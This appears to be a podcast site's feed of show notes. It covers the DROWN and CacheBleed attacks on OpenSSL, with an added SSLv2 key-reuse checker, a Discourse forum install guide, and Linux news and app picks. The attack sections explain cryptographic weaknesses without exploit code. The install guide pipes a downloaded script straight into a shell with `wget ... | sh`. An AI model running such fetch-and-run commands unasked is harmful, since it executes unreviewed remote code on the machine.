  • “Recent scans of the Internet at large show that more than 5.9 million Web servers, comprising 17 percent of all HTTPS-protected machines, directly support SSLv2. The same scans reveal that at least 936,000 TLS-protected e-mail servers also support the insecure protocol. That’s a troubling finding, given widely repeated advice that SSLv2—short for secure sockets layer version 2—be disabled. More troubling still, even when a server doesn’t allow SSLv2 connections, it may still be susceptible to attack if the underlying RSA key pair is reused on a separate server that does support the old protocol.”
  • So even a locked down and tightened up server can be compromised, if a less secure server shares the same certificate
  • I have seen this with my bank, when I changed settings in my browser to be more restrictive on what TLS versions and algorithms were used, a specific subdomain of the bank’s site would no longer load properly
  • “A website, for instance, that forbids SSLv2 may still be vulnerable if its key is used on an e-mail server that allows SSLv2”
  • How many people think to adjust the settings on their email server to protect their web server?
  • TLS security hit a new low last May with the discovery of Logjam, a vulnerability caused by deliberately weakened cryptography that allowed eavesdroppers to read and modify data passing through tens of thousands of Web and e-mail servers
  • “It’s pretty practical because if you know you want to target certain websites and they’re vulnerable, you can pretty much set up shop and the next thing you know you have all of these secure connections, the passwords, and everything else,” Matt Green, a cryptography expert at Johns Hopkins University who has read the research paper, told Ars. “It’s amazing to me that we keep finding one or two of these [vulnerabilities] per year for protocols that are this old. This shouldn’t keep happening. It kind of makes me feel like we’re not doing our jobs.”
  • “Tuesday’s OpenSSL updates make it impossible for ordinary end users to enable SSLv2 without declaring explicit intent to do so. The patch also removes support for extremely weak 1990s-era ciphers that are key to making DROWN attacks work. The weak ciphers were added to all SSL and TLS versions prior to 2000 as part of US government’s export regulations”
  • “Microsoft’s IIS versions 7.0 and on and versions 3.13 and above of the NSS crypto library all have SSLv2 disabled by default. Anyone using older versions of either of these programs should upgrade right away.”
  • “The most general DROWN attack exploits 1990s-era cryptography that uses extremely weak 40-bit symmetric encryption so software would comply with export restrictions. The attacker captures roughly 1,000 RSA key exchanges made between an end user and a vulnerable TLS server, and the connections can use any version of the SSL or TLS protocols, including the current TLS 1.2. The attacker then uses the intercepted RSA ciphertexts to initiate several thousand SSLv2 connection attempts that include an instruction for the server to use the 40-bit cipher. The attacker then compares the ciphertext to all the 2^40 possibilities”
  • “Decrypting the TLS connection requires just 2^50 computations, a task that in a worst-case scenario Amazon’s EC2 service can perform in eight hours for just $440. The researchers devised an alternate decryption method that uses a cluster of graphics cards and takes 18 hours”
  • “The researchers also devised a significantly more severe version of DROWN that works against servers running versions of OpenSSL that haven’t been patched since March 2015. It allows attackers to decrypt the “premaster secret” almost instantly. An attacker can use the technique to perform man-in-the-middle attacks that cryptographically impersonate a vulnerable server. Scans performed by the researchers show that a significant percentage of servers vulnerable to DROWN are also susceptible to this more severe version of the exploit. The finding suggests that a surprisingly large number of OpenSSL users have yet to install the March 2015 update, which unknowingly fixed the vulnerabilities that make the more severe attack possible.”
  • “DROWN is an extension of what cryptographers call the 1998 Bleichenbacher attack, named after Daniel Bleichenbacher, the Swiss cryptographer who discovered the underlying weakness in the PKCS#1 v1 encoding function. While considered a seminal exploit for the mathematical insight it provided, it wasn’t considered especially practical, because it required attackers to make hundreds of thousands or millions of connections to the victim server to compromise a single session key.”
  • “Ironically, some of the Bleichenbacher countermeasures built into the SSLv2 provided precisely the type of data required to carry out the type of so-called “padding oracle” attack that Bleichenbacher discovered. The Bleichenbacher defenses, it turned out, provided its own oracle that exposed TLS version 1.0 and later exposed it to plaintext recovery attacks. The DROWN research is notable not only because it requires many fewer queries to the server, but also because its cross-protocol nature allows attackers to exploit the SSLv2 weakness to defeat the separate TLS specification. The DROWN findings are also significant because they were the first to identify the ineffectiveness of the Bleichenbacher countermeasures, some two decades after they were added to SSLv2.”
  • Additional Coverage: CSO Online — Latest attack against TLS shows the pitfalls of intentionally weakening encryption
  • There is actually a second major exploit that is fixed by this recent OpenSSL update
  • While this one requires local access to the machine, and is much harder to pull off, the results could be quite disastrous
  • CacheBleed: A Timing Attack on OpenSSL Constant Time RSA
  • “CacheBleed is a side-channel attack that exploits information leaks through cache-bank conflicts in Intel processors. By detecting cache-bank conflicts via minute timing variations, we are able to recover information about victim processes running on the same machine. Our attack is able to recover both 2048-bit and 4096-bit RSA secret keys from OpenSSL 1.0.2f running on Intel Sandy Bridge processors after observing only 16,000 secret-key operations (decryption, signatures). This is despite the fact that OpenSSL’s RSA implementation was carefully designed to be constant time in order to protect against cache-based (and other) side-channel attacks.”
  • “While the possibility of an attack based on cache-bank conflicts has long been speculated, this is the first practical demonstration of such an attack. Intel’s technical documentation describes cache-bank conflicts as early as 2004. However, these were not widely thought to be exploitable, and as a consequence common cryptographic software developers have not implemented countermeasures to this attack.”
  • “We believe that all Sandy Bridge processors are vulnerable. Earlier microarchitectures, such as Nehalem and Core 2 may be vulnerable as well. Our attack code does not work on Intel Haswell processors, where, apparently, cache-bank conflicts are no longer an issue”
  • “Cache timing attacks exploit timing differences between accessing cached vs. non-cached data. Since accessing cached data is faster, a program can check if its data is cached by measuring the time it takes to access it.”
  • “In one form of a cache timing attack, the attacker fills the cache with its own data. When a victim that uses the same cache accesses data, the victim’s data is brought into the cache. Because the cache size is finite, loading the victim’s data into the cache forces some of the attacker’s data out of a cache. The attacker then checks which sections of its data remain in the cache, deducing from this information what parts of the victim’s memory were accessed.”
  • “To facilitate access to the cache and to allow concurrent access to the L1 cache, cache lines are divided into multiple cache banks. On the processor we tested, there are 16 banks, each four bytes wide. The cache uses bits 2-5 of the address to determine the bank that a memory location uses. In the Sandy Bridge microarchitectures, the cache can handle concurrent accesses to different cache banks, however it cannot handle multiple concurrent accesses to the same cache bank. A cache-bank conflict occurs when multiple requests to access memory in the same bank are issued concurrently. In the case of a conflict, one of the conflicting requests is served immediately, whereas other requests are delayed until the cache bank is available.”
  • “The main operation OpenSSL performs when decrypting or signing using RSA is modular exponentiation. That is, it calculates c^d mod n where d is the private key. To compute a modular exponentiation, OpenSSL repeatedly performs five squaring operations followed by one multiplication. The multiplier in the multiplications is one of 32 possible values. All the numbers involved in these operations are half the size of the key. That is, for a 2048 bit RSA key, the numbers are 1024 bits long.”
  • “Knowing which multiplier is used in each multiplication reveals the secret exponent and with it the private key. Past cache timing attacks against OpenSSL and GnuPG recover the multipliers by monitoring the cache lines in which the multipliers are stored. To protect against such attacks, OpenSSL stores the data of several multipliers in each cache line, ensuring that all of the cache lines are used in each multiplication. However, the multipliers are not spread evenly across cache banks. Instead, they are divided into 8 bins, each bin spanning two cache banks. More specifically, multipliers 0, 8, 16 and 24 only use bin 0, which spans cache banks 0 and 1. Multipliers 1, 9, 17, and 25 only use bin 1, which spans cache banks 2 and 3, etc. As a result of this memory layout, each multiplication accesses two cache banks slightly more than it accesses the other cache banks. For example, in the case of 4096-bit RSA, the multiplication makes 128 additional accesses to the multiplier’s cache banks.”
  • “Recovering a 4096 RSA key from 60% of the key material requires around two CPU hours and can be accomplished on a high-end server in less than 3 minutes.”
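The key-reuse point in the DROWN notes above (a server with SSLv2 disabled is still exposed when another server, such as the mail server, speaks SSLv2 with the same RSA key) is the kind of thing an inventory check catches before a scanner does. The following is an added example, not code from the show or from the DROWN researchers: it groups a constructed endpoint inventory by RSA key and reports every endpoint whose key is reachable through some SSLv2 oracle. Host names, key identifiers and the “patched since March 2015” flag are all constructed.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Endpoint:
    host: str
    port: int
    key_id: str                   # identifier of the RSA key in use (e.g. an SPKI hash)
    sslv2: bool                   # endpoint accepts SSLv2 handshakes
    patched_since_2015_03: bool   # OpenSSL on this host updated since the March 2015 release


# Constructed inventory (not real hosts). The web server has SSLv2 off, but the
# mail server reuses its RSA key, still speaks SSLv2 and runs old OpenSSL.
INVENTORY = [
    Endpoint("www.example.test", 443, "key-A", sslv2=False, patched_since_2015_03=True),
    Endpoint("mail.example.test", 25, "key-A", sslv2=True, patched_since_2015_03=False),
    Endpoint("api.example.test", 443, "key-B", sslv2=False, patched_since_2015_03=True),
    Endpoint("legacy.example.test", 443, "key-C", sslv2=True, patched_since_2015_03=True),
]


def drown_exposure(inventory):
    """Map (host, port) -> finding for every endpoint whose RSA key is exposed via SSLv2.

    An endpoint is exposed if *any* endpoint sharing its key accepts SSLv2, even when
    the endpoint itself has SSLv2 disabled. If one of those SSLv2 endpoints has not
    been patched since March 2015, the faster "special" variant applies to the key.
    """
    by_key = defaultdict(list)
    for ep in inventory:
        by_key[ep.key_id].append(ep)

    findings = {}
    for key_id, endpoints in by_key.items():
        oracles = [ep for ep in endpoints if ep.sslv2]
        if not oracles:
            continue  # nobody speaks SSLv2 with this key: not exposed to DROWN
        special = any(not ep.patched_since_2015_03 for ep in oracles)
        severity = "special-drown" if special else "general-drown"
        oracle_names = ", ".join(f"{o.host}:{o.port}" for o in oracles)
        for ep in endpoints:
            via = "" if ep.sslv2 else f" via {oracle_names}"
            findings[(ep.host, ep.port)] = (
                f"{severity}: key {key_id} reachable over SSLv2{via}"
            )
    return findings


def sslv2_to_disable(inventory):
    """The endpoints where SSLv2 must actually be turned off, sorted for a ticket."""
    return sorted((ep.host, ep.port) for ep in inventory if ep.sslv2)


if __name__ == "__main__":
    for (host, port), finding in sorted(drown_exposure(INVENTORY).items()):
        print(f"{host}:{port}  {finding}")
    print("disable SSLv2 on:", sslv2_to_disable(INVENTORY))
```

Replacing the key on the hardened server alone is not enough either: the finding stays until every SSLv2-speaking endpoint sharing the key is fixed.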

Feedback:


Round Up:


The post Open Server Sadness Layer | TechSNAP 256 first appeared on Jupiter Broadcasting.

]]>
How Not to Install Discourse | LAS 404 https://original.jupiterbroadcasting.net/93751/how-not-to-install-discourse-las-404/ Sun, 14 Feb 2016 19:16:01 +0000 https://original.jupiterbroadcasting.net/?p=93751 This week we talk about how you can have a working web forum in 10 minutes or less & all open source! Last week we talked about team collaboration software, but what about when you need a wider approach? In the news we talk about an open source router; Russia dumping Windows, more updates to […]

The post How Not to Install Discourse | LAS 404 first appeared on Jupiter Broadcasting.

]]>


This week we talk about how you can have a working web forum in 10 minutes or less & all open source! Last week we talked about team collaboration software, but what about when you need a wider approach?

In the news we talk about an open source router; Russia dumping Windows, more updates to video editing on Linux, a super special live unboxing & more!

Thanks to:


DigitalOcean


Ting


Linux Academy

Direct Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | OGG Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Patreon

— Show Notes: —


System76

Brought to you by: Linux Academy

Pros of Hosting Your Own Forum

Advantages:

  • Not subject to the rules of a hosting site, e.g. Reddit
  • Completely Open Source
  • Customized and branded for your community
  • Complete control over your community

Discourse – Civilized Discussion

  • 100% Open Source
  • Incorporate Discourse into your site with complete confidence, the code belongs to everyone.
  • Mobile and Tablet
  • Designed for touch devices from day one. Automatic mobile and touch layouts that scale to fit your device.
  • Optimized for Reading
  • To keep reading, just keep scrolling. When you reach the bottom, suggested topics keep you reading.
  • Single Sign On
  • Seamlessly integrate Discourse with your existing site’s login system with easy, robust single sign on.
  • CDN Support
  • Easily plug in any CDN provider to speed up global access to your site.

Step by Step Guide

  • Sign up For Digital Ocean with code lasdigital
  • Sign up for an account at SparkPost.com
  • The default is 1GB, but 2GB is recommended
  • Choose Distro of Ubuntu 14.04 LTS
  • Pick your SSH Keys
  • Log into your Droplet
  • If you’re running with 1GB or less, set up a swap file
Execute the Following Commands to Set Up Discourse

wget -qO- https://get.docker.com/ | sh

mkdir /var/discourse

git clone https://github.com/discourse/discourse_docker.git /var/discourse

cd /var/discourse

cp samples/standalone.yml containers/app.yml

nano containers/app.yml

  • Set the developer email to YOUR email
  • Set the hostname to the hostname of the machine
  • Set the SMTP address
  • Set the SMTP Port
  • Set the SMTP User
  • Set the SMTP Password

./launcher bootstrap app

./launcher start app
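Before running the bootstrap step above it is worth confirming that the six app.yml settings the list names were actually changed, because the shipped sample leaves the SMTP user and password commented out and carries example.com placeholders. The following is an added example, not part of the show notes or of Discourse’s own tooling: a small pre-flight check over the env block. The YAML excerpt is constructed; the DISCOURSE_* key names are the ones discourse_docker’s sample uses, but check them against your copy of containers/app.yml.

```python
import re

# Constructed excerpt shaped like the env block of discourse_docker's sample.
# The SMTP user/password lines are still commented out, as in the shipped sample.
SAMPLE_APP_YML = """\
env:
  LANG: en_US.UTF-8
  DISCOURSE_DEVELOPER_EMAILS: 'me@example.com,you@example.com'
  DISCOURSE_HOSTNAME: 'forum.mycommunity.org'
  DISCOURSE_SMTP_ADDRESS: smtp.sparkpostmail.com
  DISCOURSE_SMTP_PORT: 587
  #DISCOURSE_SMTP_USER_NAME: user@example.com
  #DISCOURSE_SMTP_PASSWORD: pa$$word
"""

# The six settings the install steps tell you to fill in.
REQUIRED = [
    "DISCOURSE_DEVELOPER_EMAILS",
    "DISCOURSE_HOSTNAME",
    "DISCOURSE_SMTP_ADDRESS",
    "DISCOURSE_SMTP_PORT",
    "DISCOURSE_SMTP_USER_NAME",
    "DISCOURSE_SMTP_PASSWORD",
]

# Sample values that indicate the line was never edited.
PLACEHOLDER_MARKERS = ("example.com", "pa$$word")

# Matches "  KEY: value" and "  #KEY: value"; lowercase keys such as "env:" are ignored.
LINE_RE = re.compile(r"^\s*(#?)\s*([A-Z_]+)\s*:\s*(.*?)\s*$")


def parse_env(text):
    """Return {KEY: (value, commented_out)} with surrounding quotes stripped."""
    found = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            found[m.group(2)] = (m.group(3).strip("'\""), m.group(1) == "#")
    return found


def check_app_yml(text):
    """Return a list of problems; an empty list means the six settings look set."""
    env = parse_env(text)
    problems = []
    for key in REQUIRED:
        if key not in env:
            problems.append(f"{key}: missing")
            continue
        value, commented = env[key]
        if commented:
            problems.append(f"{key}: still commented out")
        elif not value:
            problems.append(f"{key}: empty")
        elif any(marker in value for marker in PLACEHOLDER_MARKERS):
            problems.append(f"{key}: still has the sample placeholder ({value})")
        elif key == "DISCOURSE_SMTP_PORT" and not value.isdigit():
            problems.append(f"{key}: not a port number ({value})")
    return problems


if __name__ == "__main__":
    for problem in check_app_yml(SAMPLE_APP_YML) or ["app.yml looks ready to bootstrap"]:
        print(problem)
```

Since the finished file holds the SMTP password in clear text, keep containers/app.yml readable by root only.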

— PICKS —

Runs Linux

My Adult Sandbox RUNS LINUX

The East Carolina Geology department takes The East Carolinian inside its building and reveals an interesting new tool that will be used to teach students more about the topography landscapes of land and water.

The room Giaime had walked me into contained the hardware guts of the observatory’s active damping system. The lab’s seismic isolation sensors detect environmental vibrations around the observatory at all different frequencies, and then the computer systems in this room drive servos that act to dampen those vibrations.

Desktop App Pick

Sent in by Rikai

CopyQ monitors system clipboard and saves its content in customized tabs. Saved clipboard can be later copied and pasted directly into any application.

Items can be:

  • edited with internal editor or with preferred text editor,
  • moved to other tabs
  • drag’n’dropped to applications,
  • marked with tag or a note,
  • passed to or changed by custom commands,
  • simply removed.

Weekly Spotlight

Sent in by Khaotic_Linux

Stremio is an app that helps you organize and instantly watch your favorite videos, movies, TV series and TV channels.

  • Click and play your favourite movies, TV Shows, videos and TV channels.
  • Stremio automatically picks synced subtitles for your language.
  • Cast to AppleTV, Chromecast, Smart TV (DLNA/UPnP) and mobile devices.


— NEWS —

Russia to Ban Windows from Government PCs

Another radical change that German Klimenko wants to achieve is replacing Windows on all government PCs with a Linux-based operating system developed by Russia. Klimenko also stated that there are already 22,000 municipal authorities ready to replace Windows with their own operating system.

Open Source WiFi Router with Open Source Code

Our goal is to let Geek Force Board work with all popular open source systems, so that everyone can use free open source code, including OPENWRT, Android and Ubuntu Snappy, to make their own Roboto Multimedia WiFi Router Gateway Board.

  • 3 Mini PCIe Slots
  • WiFi
  • BLE
  • LTE
  • Quad Cortex A7 1.3Ghz

Geek Force Board is designed for IoT Home Multimedia and Home Automation. With a powerful Quad-core ARM Cortex-A7 1.3MHz made by Mediatek, the MT7623, it can reach the applications below (including TOR and VPN functions).

We have been engaged in the WiFi field for a long time and would like to go with the IoT trend. More and more IoT devices need a powerful gateway to link them together, with the bandwidth that media content needs.

With those interfaces, you can contribute your own roboto multimedia router.

Hardware is difficult, and we would also like to provide good open source firmware (OPENWRT, Android, Ubuntu Snappy Core) tuned so that more people can implement their own systems.

OpenShot 2.0 Beta Now Available

OpenShot 2.0 has a new beta build available for testing.

The update is the third full beta release of the revamped video editor but only the first to be made available for public testing.

Among the features, fixes and improvements that are new in OpenShot 2.0.6:

  • Smoother animations (zooming, panning, rotation)
  • Audio improvements
  • Autosave engine automatically saves your project at set intervals
  • Automatic project back-up and recovery
  • Support for importing/exporting Openshot projects across OSes
  • New Audio preview settings
  • Prompt when the application needs to “restart” for an option to take effect
  • Anonymous metric and error reporting enabled by default (can be disabled)
  • 3 Years In The Making: OpenShot 2.0 Finally Hits Beta

It’s the first major release of the non-linear video editing tool in three years, and the first to arrive since the project successfully met its funding goal in the OpenShot Kickstarter campaign held in 2013.

We’ve seen the launch of professional-grade and pseudo-open source Lightworks video editor, huge improvements made to Qt-based Kdenlive, and even user-friendly Pitivi hasn’t been shy in pushing forward.

No one app suits everyone, and for this reason if no other it is great to see OpenShot back.

  • To install OpenShot 2.0 on Ubuntu 14.04 or later run the following two commands in a new Terminal window

sudo add-apt-repository ppa:openshot.developers/libopenshot-daily

sudo apt-get update && sudo apt-get install openshot-qt

Android Phone Makers will Switch to Linux

Factory and deliver devices powered by Ubuntu.

The Linux shop has received commitments from Android smartphone and tablet makers to ship devices using its Linux with devices “later this year.”

Chief executive Jane Silber told The Register: “We are talking to them [Android OEM partners] regularly and many will be shipping Ubuntu phones. There’s a lot of interest from these folks in supporting another platform.”

The company announced the Ubuntu variant of BQ’s M10 Aquarius tablet last week. BQ, an Ubuntu partner of two years, also ships M10 on Android. BQ was already selling two handsets running Ubuntu.

Canonical is also partnering with Android partner Meizu, which is shipping the MX4.

Mozilla said last week it’s stopping production of Firefox OS for smartphones, having had enough of trying to play catch up despite having had the muscle of Telefonica to help push it. Firefox OS was a Linux-based operating system that ran HTML5. Firefox OS will now go on “things” – starting with UHD TVs from Panasonic.

She would not say which of Google’s partners, currently making and selling Android phones and tablets, Canonical has talked to, or which of those will embrace Ubuntu. However, Samsung – the biggest single beneficiary of Android on smartphones since the Galaxy – has made repeated noises about the need for an alternative.

To date, Samsung has backed Tizen, which started as LiMo and received Intel’s backing in 2011 when the project was given the Tizen rebrand.

Silber is also dismissive of the suggestion Canonical and Ubuntu haven’t exactly triumphed in their various efforts to flip Mac or Windows loyalists. The goal in 2011 was for 200 million Ubuntu users by the end of that year – but today that figure, according to Canonical, is just 30 million desktops.

“Five years ago people said, why do you need another Linux distro?”

SourceForge Acquisition and Future Plans

Our first order of business was to terminate the “DevShare” program. As of last week, the DevShare program was completely eliminated. The DevShare program delivered installer bundles as part of the download for participating projects. We want to restore our reputation as a trusted home for open source software, and this was a clear first step towards that.

Feedback:


System76

Brought to you by: System76

Mail Bag

  • https://stikked.luisaranguren.com/view/ad2b6826
  • https://stikked.luisaranguren.com/view/31292860
  • https://stikked.luisaranguren.com/view/9fe29026

Call Box

Catch the show LIVE SUNDAY:

— CHRIS’ STASH —

Chris’s Twitter account has changed, you’ll need to follow!

Chris Fisher (@ChrisLAS) | Twitter

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— NOAH’S STASH —

Noah’s Day Job

Altispeed Technologies

Contact Noah

noah [at] jupiterbroadcasting.com

Find us on Google+

Find us on Twitter

Follow us on Facebook

The post How Not to Install Discourse | LAS 404 first appeared on Jupiter Broadcasting.

]]>
Live From System76 | LAS 391 https://original.jupiterbroadcasting.net/90386/live-from-system76-las-391/ Sun, 15 Nov 2015 10:52:01 +0000 https://original.jupiterbroadcasting.net/?p=90386 We traveled to Denver Colorado to meet the folks behind System76, tour their office & record a live show on location. Join us as we go behind the scenes of a dedicated Linux hardware manufacture. Plus Linux goes to space, Firefox OS has a new trick, the good news for open source router firmware & […]

The post Live From System76 | LAS 391 first appeared on Jupiter Broadcasting.

]]>


We traveled to Denver, Colorado to meet the folks behind System76, tour their office & record a live show on location. Join us as we go behind the scenes of a dedicated Linux hardware manufacturer.

Plus Linux goes to space, Firefox OS has a new trick, the good news for open source router firmware & more!

Thanks to:


DigitalOcean


Ting

Direct Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | OGG Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:


— Show Notes: —


System76

Brought to you by: System76

LAS Visits System76

System76 is a Denver, Colorado-based computer manufacturer specializing in the sale of notebooks, desktops, and servers. They are notable for their support of open-source software, only offering Ubuntu as the installed operating system.

— PICKS —

Runs Linux

Son’s Lego Robotics Club RUNS LINUX!


Hey guys, I’ve got a runs Linux for you. My nine-year-old son wanted to join the Lego Robotics club at his elementary school. Because it is a volunteer-run program, I got roped into it. I ended up actually teaching the program and have been having a great time teaching the kids how to program their Lego EV3 robots. There are 12 kids in the group and the school district was supposed to configure 6 Apple laptops with the Lego programming software for us to use. Wouldn’t you know, there were some bureaucratic issues getting the laptops set up. Luckily, since my friends and family know I like to tinker with computers, I have 6 laptops at the house, most of which had been given to me because they had issues that I subsequently fixed. Poking around in the menus on the Lego robot, I saw that the robot ran Linux (see attached pic). Honestly, I had more than half expected they would run Linux. Imagine my dismay when I went to the Lego website to download the software to write the programs to control the robots, only to discover that the Lego software was only available for Mac and Windows! So I spent a couple of evenings updating the Windows installs on the dual boot machines, and reinstalling Windows on the Linux-only machines, and for the last 6 weeks the kids have been downloading their robot controller programs from Windows machines onto the Linux robots. So the Lego EV3 robots run Linux, and the kids have been having a blast.

Regards
Ed

Desktop App Pick

TiddlyWiki

Have you ever had the feeling that your head is not quite big enough to hold everything you need to remember?

Welcome to TiddlyWiki, a unique non-linear notebook for capturing, organising and sharing complex information.

Use it to keep your to-do list, to plan an essay or novel, or to organise your wedding. Record every thought that crosses your brain, or build a flexible and responsive website.

Weekly Spotlight

Novacut

Novacut is a collaborative video editor that aims to bring the agile, distributed workflow pioneered by free software to professional movie and TV production


— NEWS —

International Space Station Planning for Linux

Keith Chuvala of United Space Alliance, a NASA contractor deeply involved in Space Shuttle and International Space Station (ISS) operations, decided to migrate to Linux. As leader of the Laptops and Network Integration Teams, Chuvala oversees the developers in charge of writing and integrating software for the Station’s “OpsLAN” – a network of laptops that provide the ISS crew with vital capabilities for day-to-day operations, from telling the astronauts where they are, to inventory control of the equipment used, to interfacing with the cameras that capture photos and videos.

Let’s Encrypt Public Beta: December 3, 2015

Let’s Encrypt will enter Public Beta on December 3, 2015. Once we’ve entered Public Beta our systems will be open to anyone who would like to request a certificate. There will no longer be a requirement to sign up and wait for an invitation.

Our Limited Beta started on September 12, 2015. We’ve issued over 11,000 certificates since then, and this operational experience has given us confidence that our systems are ready for an open Public Beta.

If you have the Apache web server on a Debian-based Linux distribution, you can try the Apache module with automated renewal and installation:

Firefox OS 2.5 Developer Preview, an experimental Android app

  • Add-ons: Just like the add-ons we’ve come to love in desktop browsers, Firefox OS add-ons can extend just one app, several, or all of them, including the system app itself.
  • Private Browsing with Tracking Protection: A new Firefox privacy feature, Tracking Protection allows users to control how their browsing activity is tracked across many sites.
  • Pin the Web: Pin the Web removes the artificial distinction between web apps and web sites and lets you pin any web site or web page to your home screen for later usage.

  • Firefox OS Preview Android App

Introducing Firefox OS 2.5 Developer Preview, an experimental app that lets you use Firefox OS on your Android device.

The next big Gnome thing

Alex’s incredible work with xdg-app is a subject that gets talked about a lot, but it really can’t be emphasised how significant it is for GNOME as a project.

FCC: We aren’t banning DD-WRT on Wi-Fi routers

“We were not, but we agree that the guidance we provide to manufacturers must be crystal-clear to avoid confusion,” he wrote. “So, today we released a revision to that guidance to clarify that our instructions were narrowly focused on modifications that would take a device out of compliance.”

Feedback:

  • https://slexy.org/view/s214FkOi8T

  • https://slexy.org/view/s21ZHDxPup

Rover Log Playlist

Watch the adventures, productions, road trips, trails, mistakes, and fun of the Jupiter Broadcasting mobile studio.

Chris’s Twitter account has changed, you’ll need to follow!

Chris Fisher (@ChrisLAS) | Twitter

— CHRIS’ STASH —

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— NOAH’S STASH —

Noah’s Day Job

Altispeed Technologies

Contact Noah

noah [at] jupiterbroadcasting.com

Find us on Google+

Find us on Twitter

Follow us on Facebook

Catch the show LIVE Friday:

The post Live From System76 | LAS 391 first appeared on Jupiter Broadcasting.

]]>
KDE Connect All the Things | LINUX Unplugged 114 https://original.jupiterbroadcasting.net/89116/kde-connect-all-the-things-lup-114/ Tue, 13 Oct 2015 20:05:04 +0000 https://original.jupiterbroadcasting.net/?p=89116 We take a look at some of the coolest technologies coming out of the Plasma desktop & finally a open source router you and your family can use. Then we share some of our favorite ncurses terminal based applications, you might just be surprised at how modern these terminal apps are! Thanks to: Get Paid […]


We take a look at some of the coolest technologies coming out of the Plasma desktop & finally an open source router you and your family can use. Then we share some of our favorite ncurses terminal-based applications; you might just be surprised at how modern these terminal apps are!

Thanks to:

Ting

DigitalOcean

Linux Academy


Show Notes:

Pre-Show:

Feedback:

October 13, 2015. Today KDE released the second stability update for KDE Applications 15.08.

This release contains only bugfixes and translation updates, providing a safe and pleasant update for everyone.

More than 30 recorded bugfixes include improvements to ark, gwenview, kate, kbruch, kdelibs, kdepim, lokalize and umbrello.

This release also includes the Long Term Support version of KDE Development Platform, 4.14.13.

TING

Using KDE Connect to Sync your Android Device with Your Linux Computer:

It is a great app that does not require you to use KDE. There is an indicator applet to make KDE Connect work with every DE. This makes it even more awesome. 🙂

DigitalOcean

Turris Omnia

A home router is necessary to connect you to the Internet, but it is idle most of the time, just eating electricity. Why not use it for more tasks? With powerful hardware, Turris Omnia can handle gigabit traffic and still be able to do much more. You can use it as a home server, NAS or print server, and it even has a virtual server built in.

Linux Academy

Episode Idea – Ncurses everything:

Toxic is a Tox-based instant messaging client which formerly resided in the Tox core repository, and is now available as a standalone application.

Pipecut tries to facilitate the development of pipelines by letting you see your data and your shell commands at the same time, eliminating the back-and-forth editing cycle of entering and quitting more (or less), then recalling and editing the command line. Since pipecut has an AST view of the Unix command line, it can provide shortcuts and optimizations, and do code generation that would not be possible otherwise.

RTV is an application that allows you to view and interact with reddit from your terminal. It is compatible with most terminal emulators on Linux and OSX.

cmus is a small, fast and powerful console music player for Unix-like operating systems.

Tilde is a text editor for the console/terminal, which provides an intuitive interface for people accustomed to GUI environments such as Gnome, KDE and Windows. For example, the shortcut to copy the current selection is Control-C, and to paste the previously copied text the shortcut Control-V can be used. As another example, the File menu can be accessed by pressing Meta-F.

Runs Linux from the people:

  • Send in a pic/video of your runs Linux.
  • Please upload videos to YouTube and submit a link via email or the subreddit.

Support Jupiter Broadcasting on Patreon

Gridless H4X0R | TTT 218 https://original.jupiterbroadcasting.net/89081/gridless-h4x0r-ttt-218/ Tue, 13 Oct 2015 11:30:49 +0000 https://original.jupiterbroadcasting.net/?p=89081 A new big tech trend right under our noses? A new generation of nomadic high-tech workers living off the grid, while staying always connected. These developers ask why there is so much pressure to buy the biggest house, buy the best TV, get a great car? Before us now is an entire world of possibilities […]


A new big tech trend right under our noses? A new generation of nomadic high-tech workers living off the grid, while staying always connected.

These developers ask why there is so much pressure to buy the biggest house, buy the best TV, get a great car?

Before us now is an entire world of possibilities & cultures that some of us have been completely blind to. The ability to live comfortably in a tiny home or an RV, and to move about or bring your home with you when you travel, is an amazing way to live. We look at a few remarkable examples.


Show Notes:

— Episode Links —

Off the Grid, But Still Online | Motherboard

For the last 61 days I’ve been traveling throughout California while living out of my Corolla, collecting stories from people living off the grid.

The people I’ve met have abandoned the chase of the American Dream; they are not battling traffic to work a nine-to-five job in order to live in a big house or buy a fancy car. Instead, their values are centered around new life experiences, connecting with nature, building their own homes, growing their own food, and having a full sense of control over their lives—including managing the amount of time they spend on the internet.

The average American feels lost going a day without logging onto their social media accounts via smartphone, tablet, or computer. By contrast, these people know exactly how much power their solar panels need to generate to charge their phones or watch a DVD on their laptops, and they moderate their usage in the same way they would measure out exactly how much water they need to cook dinner and take a shower.

Joey Hess

So I’ve built etckeeper (managing /etc with git, for sysadmins), ikiwiki (wikis and blogs in git), and git-annex (applying git to very large files). I’m funded by a Kickstarter project in 2012-2013 to build something not unlike DropBox, based on git-annex, that automatically version controls and syncs files between computers.

I’m also a long-time Debian developer, having been involved in building the Debian installer, and I run a 30-year delayed Usenet feed at olduse.net.


This place is nicely remote, and off the grid, relying on solar power. I only get 50 amp-hours of juice on a sunny day, and often less than 15 amp-hours on a bad day. So the whole house runs on 12 volt DC power to avoid the overhead of an inverter; my laptop is powered through a succession of cheap vehicle power adapters, and my home server runs on 5 volt power provided by a USB adapter.

WatsonsWander

Since 2012 we have traveled the U.S. while living and working from our renovated 25-foot Airstream. Follow us on our crazy journey in search of beautiful scenery, fun adventures, interesting people, tasty foods, and more…

Since June 2012 we have traveled the U.S. while living and working from our 25-foot Airstream. We’ve crafted this interactive infographic, which is updated daily with the data from our journey.

Technomadia | Adventures in Nomadic Serendipity

We’ve been perpetually on the road since 2006 combining technology and travel (tech+nomad).

We’re currently full time RVers roaming around in a geeked out vintage bus conversion.

We work remotely as technology & strategy advisors, app developers and authors, always sucking up mobile internet bandwidth.

We love sharing a slice of our life from the road, providing a little inspiration and some lessons learned over the years.

Best RV Internet Access Options: The Learning Banks Uncensored at dc404 Sep 2015 – YouTube

06:05 Free Wifi – the reality
10:20 Cellular Internet – the reality
19:33 Put it all together
20:23 DIY RV wifi antenna repeater + Verizon (~$200 — Score: C)
26:40 WiFi Ranger + Wilson cradle booster and antenna (~$875 — Score: D-)
